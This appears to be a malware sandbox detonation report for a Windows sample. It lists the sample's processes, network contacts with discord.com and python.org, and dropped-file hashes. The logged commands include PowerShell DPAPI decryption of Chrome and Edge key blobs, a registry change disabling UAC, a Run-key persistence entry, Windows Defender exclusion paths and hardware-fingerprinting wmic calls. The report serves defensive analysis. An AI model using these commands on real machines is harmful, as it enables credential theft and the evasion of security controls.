C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA875.tmp" "c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn""

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn"

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Users\Admin\AppData\Local\Temp\python-installer.exe

C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe

"C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 www.python.org udp
US 162.159.136.232:443 discord.com tcp
US 151.101.192.223:443 www.python.org tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 223.192.101.151.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

memory/1684-73-0x00007FFCC52D3000-0x00007FFCC52D5000-memory.dmp

memory/1684-74-0x0000025E949B0000-0x0000025E949D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_td5nes5k.x1a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1684-84-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

memory/1684-85-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1

MD5 cbb9a56c9c8d7c3494b508934ace0b98
SHA1 e76539db673cc1751864166494d4d3d1761cb117
SHA256 027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5
SHA512 f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline

MD5 366d6358ae0e764d01dfab337fd1bdd1
SHA1 ccbdeb65c9943677f987e4d26922eb0c05808abc
SHA256 836f090daaf42522286d8a9882a61655fe67920f6f816c4c1ce8b87db6329a7b
SHA512 7b9371aff7fa2de3533baeb5eae03643bcfdb38c6897907fc206463fb12beef2b2b8b70067b4062d7afb896357a7663beef03c0ddd15569b9451b34432e5d301

\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.0.cs

MD5 ecbf151f81ff98f7dff196304a40239e
SHA1 ccf6b97b6f8276656b042d64f0595963fe9ec79c
SHA256 295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8
SHA512 4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP

MD5 d934ed5c0ef301a1a78f18c914a14d1d
SHA1 b94488c6a4b4e72ebc8cd3433cc69ac4186b3016
SHA256 0eed5958828bc41a8bbd27a6d2f0522dc00d7aa3cfde654459839641722ff5f1
SHA512 3c89f67ce422fe94fcdef09b56a0bf76eef1ef67769fd8c5c82a08c356188b3cacf04cac701623663f11c86726b0456367bb7574aa403aeff7ad208e31f497b0

C:\Users\Admin\AppData\Local\Temp\RESA875.tmp

MD5 9bd689e5278ac26e84b0e7866908535b
SHA1 e59041d291a32e63674f343f4ba130dd4e19ca5c
SHA256 f26252720fdb4f39511608db9e63c7139fa4f43420e9441723be477256fd546e
SHA512 133f4a86d10edd31426b1cea778470f66c4abf252ae602e7af124393c6880844f36368a7fd36a12be6004e03a1c452e6f21129bde0a25fba5ad73db9a084dd53

memory/1684-99-0x0000025E949E0000-0x0000025E949E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.dll

MD5 31f88152d1e3349c4902bce5e8c3b3c7
SHA1 a976dad2cc8e6d0963282666dece8feda511cde6
SHA256 f1c2017af6fd652ec105f50b0ac205b9640847306dcc1793737cca00ddae6368
SHA512 98ec2fb0fce497cab8c0b4647fecf680ff799a70c58399f71a571f2334373f5edf277017deade4c9f2b391188d2b388d855b96fb384188b7968c938bc9ff2207

memory/1684-103-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e89c193840c8fb53fc3de104b1c4b092
SHA1 8b41b6a392780e48cc33e673cf4412080c42981e
SHA256 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

memory/4584-116-0x000001C8FF830000-0x000001C8FF880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e86a2f4d6dec82df96431112380a87e6
SHA1 2dc61fae82770528bee4fe5733a8ac3396012e79
SHA256 dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a
SHA512 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UseBackup.xlsx

MD5 aad09e5816b356fce7964daaec14d955
SHA1 1594e6629cdfd7978c48f98456d219e19be227d2
SHA256 6ae6c5e94701c9f0bb9930b2c0723e85d1449689c274d607095a6ac9710acacc
SHA512 064995bf6774f00ba509caaf8a0179f8c1ff431f273c24aaf5c7f48b62a040156f5517347ecd95fde712cf187f6b9221c90607b18fe18cf3b597921eebc005bc

C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UnlockBackup.txt

MD5 be2290f73ddcedef156d4155202f3c20
SHA1 ea98970dbf35bd3b1b556abdfb09660f1cc08ec9
SHA256 eb980ff4233547e5488beb4e58685c2998ef0fd1909674c82ff2285a0b83c567
SHA512 05d0d0d6df69e311f73c1d7cfb35279c2b696105cbdc115f43f98466c5cf030d2be31d76104b70456933f2b03bac74b1294dac8937f922190747f88953e686a9

C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\BackupStart.csv

MD5 6babe9070e590172a9797afb604cfb90
SHA1 c8aac29f9220e399a829fb02b07c66396481bc82
SHA256 72bf9fb0dfb94a02559b2be4519178ceb1bb63b837b7cb0a7d8192154a0622ad
SHA512 5190ebedd44ed2e31dbba51d12d911ec56102c8b3853698bad46a1c6e9608b336588aa1ee91954c237fc4bb1e58418d1f280e41737e4f1d24eb58b1bfa935548

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7bde4b527f6c280b58f471b90da7fac8
SHA1 d5b685a260a01dd33f8732c8cbc976b2989f6188
SHA256 38ad355760e10eabaa9a9f00436975e1c1e1323e383412abdb108f2980cc7911
SHA512 c2d95bf41e99e07f77a49be23bc143a785a5544474cf6c40e4d93b89d48e25afb36964368f3c5aedb5d253cb3debe5ed4b08ce3e8d955d0758cfb744f3535a6c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa62682ae5c4db5ff5c8081be40619a3
SHA1 c8492e65565a2bf0913cf501fbd4109e22f32ef3
SHA256 044ae72c1d6bd0d35731d675cad25040163bc0d06970772bd7b04e79b7b7618a
SHA512 fa940f723775420022e5f58e276d8f5ddba51dbe17a7227ab349a34498e687bb1159d0615a17a68d1a5416cc0c103951bdb05856dd984856703f16733bd8b5fd

C:\Users\Admin\AppData\Local\Temp\python-installer.exe

MD5 d8548aa7609a762ba66f62eeb2ca862d
SHA1 2eb85b73cab52693d3a27446b7de1c300cc05655
SHA256 5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a
SHA512 37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe

MD5 931227a65a32cebf1c10a99655ad7bbd
SHA1 1b874fdef892a2af2501e1aaea3fcafb4b4b00c6
SHA256 1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d
SHA512 0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\PythonBA.dll

MD5 8c8e5a5ca0483abdc6ad6ef22c73b5d2
SHA1 9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc
SHA256 edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43
SHA512 861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\SideBar.png

MD5 888eb713a0095756252058c9727e088a
SHA1 c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4
SHA256 79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067
SHA512 7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\pip_JustForMe

MD5 494f112096b61cb01810df0e419fb93c
SHA1 295c32c8e1654810c4807e42ba2438c8da39756a
SHA256 2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80
SHA512 9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704

C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

MD5 f6ddadd0d817ce569e202e57863ae919
SHA1 3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2
SHA256 63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1
SHA512 7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

MD5 fd7e13f2c36fe528afc7a05892b34695
SHA1 14a9c4dfd12e1f9b1e64e110166500be1ef0abb1
SHA256 2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0
SHA512 7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_000_core_JustForMe.log

MD5 9f190f62aace0367c91a959cc11ea7db
SHA1 df84e4a53a2d563fee16f1aadb04972ea4307a8e
SHA256 154b0f66e674f0280637d37b66c4b89e5bfd8ecd81441bf9d0f567266c39288d
SHA512 55b7040a6d86b5b4a0a6fe06071a712242b9ace0f29431621ec81c382e4f52a35bb79b6d995a7e19c9770436e5531db03475f5d4331eeb4f4d355a2175e6955e

C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

MD5 d4c1f834f30032f220409a17e0f688cd
SHA1 61dc90b164c3797456a8ed775b353a087054fd0f
SHA256 675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12
SHA512 b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

C:\Config.Msi\e57de3d.rbs

MD5 48a46d6b43040711c0339edd00fc86a5
SHA1 f9216314a251fa6d35004b4c4092fd533259f0ee
SHA256 4241d8b5549ca50e0072e81c527f094f37f3e7f467654fe73d794b20c12e9fb4
SHA512 4d84d96dfa0f365ef905c519301110428d162d43c0b0dabfe3525c44f2a4f516dbc267070957ce6bbda441b5e33aa75f97c864a1dda097fd533d5916d0f680b5

C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_001_exe_JustForMe.log

MD5 ff82da4f8a0c5548cc732f210c8b52b8
SHA1 2e05b46beae3f3ae7cbdfa43b7f2cac790b014e6
SHA256 8a102c85ee623ee6710178fa0af65611b668758ccb3314c0a9ce141aa6929652
SHA512 57ea4ddfd570c901c0e751cdc7dbf91a0767086baf3e3d069d79e0e02de94078cd6ae89ee434c773b45c12fb044b494242e8e4262de8af589e4f9af7f6854b83

C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi

MD5 2db9e147e0fd938c6d3c1e7cf6942496
SHA1 e4333f4334b5df6f88958e03ad18b54e64a1331f
SHA256 9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab
SHA512 4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 02:47

Reported

2024-11-04 02:50

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

Network

N/A

Files

N/A